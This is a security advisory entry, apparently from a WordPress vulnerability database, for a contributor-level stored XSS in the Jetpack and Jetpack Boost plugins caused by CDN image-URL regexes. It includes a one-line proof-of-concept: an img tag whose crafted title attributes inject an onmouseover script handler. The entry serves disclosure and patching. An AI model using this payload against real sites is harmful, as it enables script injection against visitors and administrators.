Jetpack < 13.8, Boost < 3.4.8 – Contributor+ Stored XSS | CVE 2024-10076 | Plugin Vulnerabilities

Description

The plugins use regexes in the Site Accelerator features when switching image URLs to their CDN counterpart. Unfortunately, some of them may match patterns it shouldn’t, ultimately making it possible for contributor and above users to perform Stored XSS attacks

Proof of Concept

Put the payload below in an HTML block within a post:

<img src="https://example.com/wp-content/uploads/2024/08/some-image-hosted-on-the-site.png" title="a width='10" Title="a onmouseover=alert(1);//" />

Affects Plugins

Fixed in 13.8

Fixed in 3.4.8

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Marc Montpas

Submitter

Marc Montpas

Verified

Yes

WPVDB ID

15f278f6-0418-4c83-b925-b1a2d8c53e2f

Timeline

Publicly Published

2024-09-04 (about 1 year ago)

Added

2024-10-17 (about 1 year ago)

Last Updated

2024-10-17 (about 1 year ago)

Other

Published

Title

Published

2015-08-10

Title

Easy Table < 1.5.3 - Stored Cross-Site Scripting via CSRF

Published

2023-06-19

Title

Enable SVG Uploads <= 2.1.5 - Author+ Stored XSS via SVG

Published

2024-06-04

Title

GP Premium < 2.4.1 - Reflected Cross-Site Scripting

Published

2025-04-11

Title

SKT Blocks – Gutenberg based Page Builder < 2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2023-02-23

Title

Custom Login Page <= 2.0 - Admin+ Stored XSS